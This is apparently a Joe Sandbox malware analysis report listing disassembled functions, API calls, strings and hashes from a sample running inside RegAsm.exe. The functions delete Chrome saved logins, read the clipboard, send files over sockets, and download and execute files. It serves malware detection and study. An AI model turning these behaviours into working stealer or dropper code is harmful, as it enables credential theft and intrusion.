                                • Instruction Fuzzy Hash: 6E21617060430256CB14FBB68856AAE63599F41788F41487FB442A72D3EF3CD845CBAE
                                Function 0045243C Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 86COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • GetLocaleInfoW.KERNEL32(00000000,2000000B,00000000,00000002,00000000,?,?,?,0045275B,?,00000000), ref: 004524D5
                                • GetLocaleInfoW.KERNEL32(00000000,20001004,00000000,00000002,00000000,?,?,?,0045275B,?,00000000), ref: 004524FE
                                • GetACP.KERNEL32(?,?,0045275B,?,00000000), ref: 00452513
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: InfoLocale
                                • String ID: ACP$OCP$['E
                                • API String ID: 2299586839-2532616801
                                • Opcode ID: 996ac876140471f7f335f389899e539d753f319036e5aa489baf53db5bb263cf
                                • Instruction ID: 65f7b5195a5790e2d5819d7d4b0c6b76a8aa59636dcad79128a037cfc813d78c
                                • Opcode Fuzzy Hash: 996ac876140471f7f335f389899e539d753f319036e5aa489baf53db5bb263cf
                                • Instruction Fuzzy Hash: FD21F432600104A7DB348F54CF00AA773A6EB47B1AB168567EC09D7302F7BADD48C398
                                Function 0040BA12 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON
                                Download Yara Rule
                                APIs
                                • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040BA4E
                                • GetLastError.KERNEL32 ref: 0040BA58
                                Strings
                                • UserProfile, xrefs: 0040BA1E
                                • [Chrome StoredLogins not found], xrefs: 0040BA72
                                • [Chrome StoredLogins found, cleared!], xrefs: 0040BA7E
                                • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040BA19
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: DeleteErrorFileLast
                                • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                • API String ID: 2018770650-1062637481
                                • Opcode ID: 0869f95c927aca72a4aa01e0263511fc677d69a40d3c9f55f6e6efd0e01f34cf
                                • Instruction ID: af402a2c9819bc64f7c9913ab42ffc044d60d1b3c88a69bbc3d4df1d4d30a246
                                • Opcode Fuzzy Hash: 0869f95c927aca72a4aa01e0263511fc677d69a40d3c9f55f6e6efd0e01f34cf
                                • Instruction Fuzzy Hash: 2D01A7B17801056AC70477B6CD5B9BE77249911704F50057FF802725E2FE7D59098ADE
                                Function 00417952 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 33COMMON
                                Download Yara Rule
                                APIs
                                • GetCurrentProcess.KERNEL32(00000028,?), ref: 0041795F
                                • OpenProcessToken.ADVAPI32(00000000), ref: 00417966
                                • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00417978
                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00417997
                                • GetLastError.KERNEL32 ref: 0041799D
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                • String ID: SeShutdownPrivilege
                                • API String ID: 3534403312-3733053543
                                • Opcode ID: 57e92913f0a9f4d9b3a8183d8d88438ae359a92b07d5b7f7122e8f665953110d
                                • Instruction ID: b599e5caaba2c857c5a7044ea86e3d1b9a306509f9612008a7a3a71442eb1233
                                • Opcode Fuzzy Hash: 57e92913f0a9f4d9b3a8183d8d88438ae359a92b07d5b7f7122e8f665953110d
                                • Instruction Fuzzy Hash: 1EF03AB1801229FBDB109BA0EC4DEEF7FBCEF05612F100461B809A1092D7388E04CAB5
                                Function 00409253 Relevance: 9.3, APIs: 6, Instructions: 293fileCOMMON
                                Download Yara Rule
                                APIs
                                • __EH_prolog.LIBCMT ref: 00409258
                                  • Part of subcall function 004048C8: connect.WS2_32(?,?,?), ref: 004048E0
                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                • __CxxThrowException@8.LIBVCRUNTIME ref: 004092F4
                                • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00409352
                                • FindNextFileW.KERNEL32(00000000,?), ref: 004093AA
                                • FindClose.KERNEL32(00000000), ref: 004093C1
                                  • Part of subcall function 00404E26: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                                  • Part of subcall function 00404E26: SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                                  • Part of subcall function 00404E26: CloseHandle.KERNEL32(?), ref: 00404E4C
                                • FindClose.KERNEL32(00000000), ref: 004095B9
                                  • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                  • Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
                                • String ID:
                                • API String ID: 1824512719-0
                                • Opcode ID: 79a333ab798d4f3832fd98009e5fc83f15b4850663dec53ce8833ea938511d01
                                • Instruction ID: 125c9cc0036adb3739497efb01147483584b5989e706bb19fe9a4109aadf0594
                                • Opcode Fuzzy Hash: 79a333ab798d4f3832fd98009e5fc83f15b4850663dec53ce8833ea938511d01
                                • Instruction Fuzzy Hash: DCB18D32900109AACB14EBA1DD96AED7779AF04318F10417FF506B60E2EF785E49CB98
                                Function 0041AA4A Relevance: 9.0, APIs: 6, Instructions: 39serviceCOMMON
                                Download Yara Rule
                                APIs
                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,0041A6A0,00000000), ref: 0041AA53
                                • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,0041A6A0,00000000), ref: 0041AA68
                                • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA75
                                • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,0041A6A0,00000000), ref: 0041AA80
                                • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA92
                                • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA95
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Service$CloseHandle$Open$ManagerStart
                                • String ID:
                                • API String ID: 276877138-0
                                • Opcode ID: 55aea4e01c19578bfbdca94b163ddb40001bd342cd849d2c6829f49351802c7e
                                • Instruction ID: 9fefcdd13c5f6832e1e8d6374d810b05479d45f16fba084c356bea358aebaaee
                                • Opcode Fuzzy Hash: 55aea4e01c19578bfbdca94b163ddb40001bd342cd849d2c6829f49351802c7e
                                • Instruction Fuzzy Hash: FCF08971101325AFD2119B619C88DFF2B6CDF85BA6B00082AF945921919B68CD49E9B9
                                Function 0041B4A8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMON
                                Download Yara Rule
                                APIs
                                • FindResourceA.KERNEL32 ref: 0041B4B9
                                • LoadResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4CD
                                • LockResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4D4
                                • SizeofResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4E3
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Resource$FindLoadLockSizeof
                                • String ID: SETTINGS
                                • API String ID: 3473537107-594951305
                                • Opcode ID: 572f255012f9d3464d264dba9da87f940f43aba7d13ccaaee0753afa8a381888
                                • Instruction ID: 65170a014006dd87783428e4339c5f85687a52ee3761dac8d56b05c0676c202a
                                • Opcode Fuzzy Hash: 572f255012f9d3464d264dba9da87f940f43aba7d13ccaaee0753afa8a381888
                                • Instruction Fuzzy Hash: 8AE01A36200B22EBEB311BA5AC4CD473E29F7C97637100075F90596232CB798840DAA8
                                Function 00409665 Relevance: 7.7, APIs: 5, Instructions: 222fileCOMMON
                                Download Yara Rule
                                APIs
                                • __EH_prolog.LIBCMT ref: 0040966A
                                • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 004096E2
                                • FindNextFileW.KERNEL32(00000000,?), ref: 0040970B
                                • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00409722
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$File$CloseFirstH_prologNext
                                • String ID:
                                • API String ID: 1157919129-0
                                • Opcode ID: fb173912142d451d8169f8852f62cc003beda93b99b20e6bd32f4a4dc40a9ea1
                                • Instruction ID: bc6583c976318a9931a9d4e75bf6093b5b8d8c817350453c5398c0af4fd679c1
                                • Opcode Fuzzy Hash: fb173912142d451d8169f8852f62cc003beda93b99b20e6bd32f4a4dc40a9ea1
                                • Instruction Fuzzy Hash: 59812B329001199BCB15EBA1DC969EDB378AF14318F10417FE506B71E2EF78AE49CB58
                                Function 0040880C Relevance: 7.7, APIs: 5, Instructions: 186fileCOMMON
                                Download Yara Rule
                                APIs
                                • __EH_prolog.LIBCMT ref: 00408811
                                • FindFirstFileW.KERNEL32(00000000,?,00466608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088CA
                                • __CxxThrowException@8.LIBVCRUNTIME ref: 004088F2
                                • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088FF
                                • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408A15
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                                • String ID:
                                • API String ID: 1771804793-0
                                • Opcode ID: 8f16439d90f6ec0f7283b04e08810252f4f5a069acaf261fa4213b3c41c94a9d
                                • Instruction ID: 1e810be39857a3d86828f92fa26e793a4655b35e172fafea17edde612d57cc14
                                • Opcode Fuzzy Hash: 8f16439d90f6ec0f7283b04e08810252f4f5a069acaf261fa4213b3c41c94a9d
                                • Instruction Fuzzy Hash: 16515F72900209AACF04FB61DD569ED7778AF11308F50417FB946B61E2EF389B48CB99
                                Function 00406EB0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 222filenetworkCOMMON
                                Download Yara Rule
                                APIs
                                • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406FBC
                                • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004070A0
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: DownloadExecuteFileShell
                                • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$open
                                • API String ID: 2825088817-3056885514
                                • Opcode ID: 04b4479cfc875b759f2309251f1f784269732d1ca75bb09c24481e831bd5b80b
                                • Instruction ID: 27a8b34c094a82f854f2ee3e6b31e6014a71d41456184bc7540e3ceb6c1d0c01
                                • Opcode Fuzzy Hash: 04b4479cfc875b759f2309251f1f784269732d1ca75bb09c24481e831bd5b80b
                                • Instruction Fuzzy Hash: 6561A171B0830166CA24FB76C8569BE37A59F81748F50093FB942772D2EE3C9905C69B
                                Function 0040783C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 86fileCOMMON
                                Download Yara Rule
                                APIs
                                • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00407857
                                • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 0040791F
                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: FileFind$FirstNextsend
                                • String ID: XPG$XPG
                                • API String ID: 4113138495-1962359302
                                • Opcode ID: ef4afc18dc9d34da461ea20a285219582541565e32a666253127ded6bb227160
                                • Instruction ID: 6b6d716c6ecdfe6ec78918620e47e684a121d368db73a1555a51ac38f2ecb6eb
                                • Opcode Fuzzy Hash: ef4afc18dc9d34da461ea20a285219582541565e32a666253127ded6bb227160
                                • Instruction Fuzzy Hash: 212195325083419BC314FB61D855DEFB3ACAF90358F40493EF696621E1EF78AA09C65B
                                Function 00451CD8 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 236COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                  • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                  • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                  • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00444A73,?,?,?,?,004444CA,?,00000004), ref: 00451DBA
                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,sJD,00000000,?), ref: 00451EFB
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLast$CodeInfoLocalePageValid_abort_free
                                • String ID: sJD
                                • API String ID: 1661935332-3536923933
                                • Opcode ID: 7ea90a810ccb8eded513053f15f94d45dc96679ac5d2c45bddb92c1ff4a69e8d
                                • Instruction ID: 601d6103ecad0283333aca7e4f79148897faf6e4cefa34abd84194fcdbd45a0d
                                • Opcode Fuzzy Hash: 7ea90a810ccb8eded513053f15f94d45dc96679ac5d2c45bddb92c1ff4a69e8d
                                • Instruction Fuzzy Hash: ED61FA35500606AAE724AB75CC86BBB73A8EF04316F14046FFD05D7292EB78ED48C769
                                Function 004520C3 Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                  • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                  • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                  • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                  • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                                  • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281
                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452117
                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452168
                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452228
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorInfoLastLocale$_free$_abort
                                • String ID:
                                • API String ID: 2829624132-0
                                • Opcode ID: b894af2e73636fd6e8af7e748ba09ab431642972e93d3e8eb2aea65845f920f8
                                • Instruction ID: 4b80d7ab7a7ff47978e382ad652e238d088576b56b9f239e8998609391b98480
                                • Opcode Fuzzy Hash: b894af2e73636fd6e8af7e748ba09ab431642972e93d3e8eb2aea65845f920f8
                                • Instruction Fuzzy Hash: B961C1315006079BDB289F25CE82BBB77A8FF05306F1041ABED15C6642F7B89D89DB58
                                Function 0043BB22 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • IsDebuggerPresent.KERNEL32 ref: 0043BC1A
                                • SetUnhandledExceptionFilter.KERNEL32 ref: 0043BC24
                                • UnhandledExceptionFilter.KERNEL32(?), ref: 0043BC31
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                • String ID:
                                • API String ID: 3906539128-0
                                • Opcode ID: a72bbe9f24da65e63e608425843f2cf14cbf2294963ef3e60e5c7cfd459546ed
                                • Instruction ID: cbfc558a7ca4bb69983b526de44ffd1abc81b2e56a4044740c9350c1ecaeaada
                                • Opcode Fuzzy Hash: a72bbe9f24da65e63e608425843f2cf14cbf2294963ef3e60e5c7cfd459546ed
                                • Instruction Fuzzy Hash: E131C27590121DABCB21DF65DD89BCDBBB8AF08311F5051EAE80CA6251EB349F858F48
                                Function 004432B5 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • GetCurrentProcess.KERNEL32(?,?,0044328B,?), ref: 004432D6
                                • TerminateProcess.KERNEL32(00000000,?,0044328B,?), ref: 004432DD
                                • ExitProcess.KERNEL32 ref: 004432EF
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$CurrentExitTerminate
                                • String ID:
                                • API String ID: 1703294689-0
                                • Opcode ID: fda3935ef75a9da2a187ce407300f3730e4ebfece79a37869d002a8a215f2f15
                                • Instruction ID: 3be6e6b92543006147ef5d7b2afd166c5ab2c5ffe072a920593a5ac20c7500e8
                                • Opcode Fuzzy Hash: fda3935ef75a9da2a187ce407300f3730e4ebfece79a37869d002a8a215f2f15
                                • Instruction Fuzzy Hash: D6E0BF31400244FBDF126F55DD0AA993B69FB40757F044469F90946232CB7ADE42CA98
                                Function 0040B70E Relevance: 4.5, APIs: 3, Instructions: 19clipboardCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Clipboard$CloseDataOpen
                                • String ID:
                                • API String ID: 2058664381-0
                                • Opcode ID: d38c0863fa6e1407ff7c70a07519499014c38180332fc89bd075bae9f751f2b8
                                • Instruction ID: a9752f6e69e3a39ef1c6dae57fb9473311d117e3f10fa11c4aa70225693e5904
                                • Opcode Fuzzy Hash: d38c0863fa6e1407ff7c70a07519499014c38180332fc89bd075bae9f751f2b8
                                • Instruction Fuzzy Hash: 4FE0EC31645320EFC2209B609C49B9A6754DF95F52F41843AB905AB2D5DB78CC40C6AD
                                Function 0044E879 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: .
                                • API String ID: 0-248832578
                                • Opcode ID: 6d782d14881953f3dc1aa7198760a6549ba6db1eba9a251ec7cea06479966fa1
                                • Instruction ID: 28de479bcd0ee174bbf7ea2f8c467f6584cf945aa63ddb2e5cfeaaf716254919
                                • Opcode Fuzzy Hash: 6d782d14881953f3dc1aa7198760a6549ba6db1eba9a251ec7cea06479966fa1
                                • Instruction Fuzzy Hash: 233106B2900149AFEB249E7ACC85EEB7BBDEF45304F1001AEE819D7291E6349D458B54
                                Function 00451F9B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                  • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                  • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                  • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                • EnumSystemLocalesW.KERNEL32(004520C3,00000001,00000000,?,lJD,?,004526F0,00000000,?,?,?), ref: 0045200D
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                • String ID: lJD
                                • API String ID: 1084509184-3316369744
                                • Opcode ID: 8fcc83528109b8aaf498f975bbbcb34ae0404b7acadb8afce226787919ce0173
                                • Instruction ID: 7d3ee128790e63e9d167a680a676634a6e0759605f9449bc3b94779c572ada63
                                • Opcode Fuzzy Hash: 8fcc83528109b8aaf498f975bbbcb34ae0404b7acadb8afce226787919ce0173
                                • Instruction Fuzzy Hash: E51125372007019FDB189F39C8916BABB91FF8075AB14482EEE4687B41D7B9A946CB44
                                Function 00452036 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                  • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                  • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                  • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                • EnumSystemLocalesW.KERNEL32(00452313,00000001,?,?,lJD,?,004526B4,lJD,?,?,?,?,?,00444A6C,?,?), ref: 00452082
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                • String ID: lJD
                                • API String ID: 1084509184-3316369744
                                • Opcode ID: acb24ebe04e4856a9c83d3494bcbe1da60fd92419c71b9527b23937778bf3cf5
                                • Instruction ID: 5d4b7cb44ca553c54ae5d492338df10e7871f8ce083c0ea6e3a4370b1d871309
                                • Opcode Fuzzy Hash: acb24ebe04e4856a9c83d3494bcbe1da60fd92419c71b9527b23937778bf3cf5
                                • Instruction Fuzzy Hash: 44F0FF322003055FDB245F798881A7A7B95FB82769B14446EFE428B681D7F9AC02C604
                                Function 004488ED Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,004444CA,?,00000004), ref: 00448940
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: InfoLocale
                                • String ID: GetLocaleInfoEx
                                • API String ID: 2299586839-2904428671
                                • Opcode ID: eeff4f7349616e56738bbc7b8787175557d4d7270555fb13a45f0baf29077f94
                                • Instruction ID: 280d24bb3358c3803ceca68c405fa8cd3b52f77a8ef21af096b961815111c089
                                • Opcode Fuzzy Hash: eeff4f7349616e56738bbc7b8787175557d4d7270555fb13a45f0baf29077f94
                                • Instruction Fuzzy Hash: D1F02B31A40308F7DB119F61DC02F7E7B15DF08751F10056EFC0926261CE399D159A9E
                                Function 00412077 Relevance: 2.6, APIs: 2, Instructions: 55memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F37,?,?,?,?,?), ref: 004120E7
                                • HeapFree.KERNEL32(00000000), ref: 004120EE
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$FreeProcess
                                • String ID:
                                • API String ID: 3859560861-0
                                • Opcode ID: f8b7229bde56183a56125516245bdcff620dba8344b2748e8b36a977d3a4176b
                                • Instruction ID: eee285bae3a3c664d400e4c5f5e220380537cd22e0998a3ce94cd1697e41dfe3
                                • Opcode Fuzzy Hash: f8b7229bde56183a56125516245bdcff620dba8344b2748e8b36a977d3a4176b
                                • Instruction Fuzzy Hash: 16112A32000B11EFC7305F64DE85957BBE9FF08715314892EE29696921CB76FCA0CB58
                                Function 00434C52 Relevance: 1.6, APIs: 1, Instructions: 134COMMON
                                Download Yara Rule
                                APIs
                                • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00434C6B
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: FeaturePresentProcessor
                                • String ID:
                                • API String ID: 2325560087-0
                                • Opcode ID: e737252210e65bd7558355cab1b99ff1055998ec76fc21d90816c5055d8ae967
                                • Instruction ID: b6e659610939bc40af268f25ffb2b9965a4fe426cdd66f7fc4435c5297b2c53a
                                • Opcode Fuzzy Hash: e737252210e65bd7558355cab1b99ff1055998ec76fc21d90816c5055d8ae967
                                • Instruction Fuzzy Hash: EE515471D002089BEB24CF69D9856DEBBF4FB48354F24956BD819EB350D378AA80CF94
                                Function 00452313 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                  • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                  • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                  • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
